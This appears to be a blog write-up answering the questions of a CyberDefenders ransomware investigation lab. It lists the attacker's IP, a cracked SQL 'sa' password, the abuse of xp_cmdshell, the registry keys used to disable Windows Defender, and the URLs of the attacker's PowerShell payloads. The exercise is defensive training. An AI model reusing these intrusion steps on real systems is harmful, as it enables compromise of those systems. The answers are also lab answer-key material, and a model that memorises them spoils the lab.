GLITCH
  • Who Am I ?
  • WRITEUPS
    • CyberDefenders Labs
      • PhishStrike Write-up
      • OpenWire Write-up
      • BlueSky Ransomware Write-up
      • PsExec Hunt Write-up
      • Red Stealer Write-up
      • Amadey Write-up
      • GrabThePhisher Write-up
      • BlackEnergy Write-up
  • SUMMARIEs
    • Phishing
    • Kerberos_AD
    • Bug Hunting
    • MITRE
  • OSEP
  • GLITCH HUB
    • Books
    • Courses
      • Youtube
    • Githubs
    • Tools
    • Bookmarks
  • Projects
    • Youtube Downloader
  • Malware Analysis
    • SOON!
Powered by GitBook
On this page
  • Scenario:
  • Tools:
  • Questions:
  • 1. Knowing the source IP of the attack allows security teams to respond to potential threats quickly. Can you identify the source IP responsible for potential port scanning activity?
  • 2. During the investigation, it’s essential to determine the account targeted by the attacker. Can you identify the targeted account username?
  • 3. We need to determine if the attacker succeeded in gaining access. Can you provide the correct password discovered by the attacker?
  • 4. Attackers often change some settings to facilitate lateral movement within a network. What setting did the attacker enable to control the target host further and execute further commands?
  • 5. Process injection is often used by attackers to escalate privileges within a system. What process did the attacker inject the C2 into to gain administrative privileges?
  • 6. Following privilege escalation, the attacker attempted to download a file. Can you identify the URL of this file downloaded?
  • 7. Understanding which group Security Identifier (SID) the malicious script checks to verify the current user’s privileges can provide insights into the attacker’s intentions. Can you provide the specific Group SID that is being checked?
  • 8. Windows Defender plays a critical role in defending against cyber threats. If an attacker disables it, the system becomes more vulnerable to further attacks. What are the registry keys used by the attacker to disable Windows Defender functionalities? Provide them in the same order found.
  • 9. Can you determine the URL of the second file downloaded by the attacker?
  • 10. Identifying malicious tasks and understanding how they were used for persistence helps in fortifying defenses against future attacks. What’s the full name of the task created by the attacker to maintain persistence?
  • 11. According to your analysis of the second malicious file, what is the MITRE ID of the tactic the file aims to achieve?
  • 12. What’s the invoked PowerShell script used by the attacker for dumping credentials?
  • 13. Understanding which credentials have been compromised is essential for assessing the extent of the data breach. What’s the name of the saved text file containing the dumped credentials?
  • 14. Knowing the hosts targeted during the attacker’s reconnaissance phase, the security team can prioritize their remediation efforts on these specific hosts. What’s the name of the text file containing the discovered hosts?
  • 15. After hash dumping, the attacker attempted to deploy ransomware on the compromised host, spreading it to the rest of the network through previous lateral movement activities using SMB. You’re provided with the ransomware sample for further analysis. By performing behavioral analysis, what’s the name of the ransom note file?
  • 16. In some cases, decryption tools are available for specific ransomware families. Identifying the family name can lead to a potential decryption solution. What’s the name of this ransomware family?
  • You Can Find me Here!
  1. WRITEUPS
  2. CyberDefenders Labs

BlueSky Ransomware Write-up

:الحمد لله والصلاة والسلام على رسول الله وعلى آله وصحبه أما بعد

PreviousOpenWire Write-upNextPsExec Hunt Write-up

Last updated 6 months ago

Scenario:

As a cybersecurity analyst on SecureTech’s Incident Response Team, you’re tackling an urgent case involving a high-profile corporation that suspects a sophisticated cyber attack on its network. The corporation, which manages critical data across various industries, has experienced a ransomware attack, leading to the encryption of files and an immediate need for expert assistance to mitigate the damages and investigate the breach.

Your role in the team is to conduct a detailed analysis of the evidence to determine the extent and nature of the attack. Your objective is to identify the tactics, techniques, and procedures (TTPs) used by the threat actor to help your client contain the threat and restore the integrity of their network.

Tools:

  • Wireshark

  • Network Miner

  • Windows Event Viewer

  • Event Log Explorer

  • VirusTotal

  • CyberChef

Link:

Writeup on medium:

Questions:

1. Knowing the source IP of the attack allows security teams to respond to potential threats quickly. Can you identify the source IP responsible for potential port scanning activity?

You can find it by a little search

Answer: 87.96.21.84

2. During the investigation, it’s essential to determine the account targeted by the attacker. Can you identify the targeted account username?

Look for packet number 2641 And show the TDS7 Login Packet

Answer: sa

3. We need to determine if the attacker succeeded in gaining access. Can you provide the correct password discovered by the attacker?

Answer: cyb3rd3f3nd3r$

4. Attackers often change some settings to facilitate lateral movement within a network. What setting did the attacker enable to control the target host further and execute further commands?

Answer: xp_cmdshell

5. Process injection is often used by attackers to escalate privileges within a system. What process did the attacker inject the C2 into to gain administrative privileges?

We can now use Event View Search for 400ID (Event ID 400 indicates when a new PowerShell host process has started)

Answer: winlogon.exe

6. Following privilege escalation, the attacker attempted to download a file. Can you identify the URL of this file downloaded?

7. Understanding which group Security Identifier (SID) the malicious script checks to verify the current user’s privileges can provide insights into the attacker’s intentions. Can you provide the specific Group SID that is being checked?

Open the first file attacker downloaded and look for first line

Answer: S-1–5–32–544

8. Windows Defender plays a critical role in defending against cyber threats. If an attacker disables it, the system becomes more vulnerable to further attacks. What are the registry keys used by the attacker to disable Windows Defender functionalities? Provide them in the same order found.

in the same script scroll down to get StopAV Funcation

Answer: DisableAntiSpyware,DisableRoutinelyTakingAction,DisableRealtimeMonitoring,SubmitSamplesConsent,SpynetReporting

9. Can you determine the URL of the second file downloaded by the attacker?

10. Identifying malicious tasks and understanding how they were used for persistence helps in fortifying defenses against future attacks. What’s the full name of the task created by the attacker to maintain persistence?

Go to packet number 4219 and scroll down to get the CleanerETC Funcation

Answer: \Microsoft\Windows\MUI\LPupdate

11. According to your analysis of the second malicious file, what is the MITRE ID of the tactic the file aims to achieve?

Open del.ps1 file and search or ask chatgpt for help

Answer: TA0005

12. What’s the invoked PowerShell script used by the attacker for dumping credentials?

Answer: invoke-PowerDump.ps1

13. Understanding which credentials have been compromised is essential for assessing the extent of the data breach. What’s the name of the saved text file containing the dumped credentials?

go to 4273 packet

Answer: hashes.txt

14. Knowing the hosts targeted during the attacker’s reconnaissance phase, the security team can prioritize their remediation efforts on these specific hosts. What’s the name of the text file containing the discovered hosts?

Answer: extracted_hosts.txt

15. After hash dumping, the attacker attempted to deploy ransomware on the compromised host, spreading it to the rest of the network through previous lateral movement activities using SMB. You’re provided with the ransomware sample for further analysis. By performing behavioral analysis, what’s the name of the ransom note file?

Answer: DECRYPT FILES BLUESKY

16. In some cases, decryption tools are available for specific ransomware families. Identifying the family name can lead to a potential decryption solution. What’s the name of this ransomware family?

get hash for the malware and put him in virustotal

Answer: conti

You Can Find me Here!

Answer:

Answer:

By hash file use the site and go to the File Tap and you get it!

Linkedin:

Facebook:

Tryhackme:

https://cyberdefenders.org/blueteam-ctf-challenges/bluesky-ransomware/
https://medium.com/@GLITCHGC/bluesky-ransomware-write-up-780ca4a0f7fc
http://87.96.21.84/checking.ps1
http://87.96.21.84/del.ps1
ANY.RUN
https://www.linkedin.com/in/glitchgc/
https://www.facebook.com/GLITC.GC/
https://tryhackme.com/p/GLITCH1GC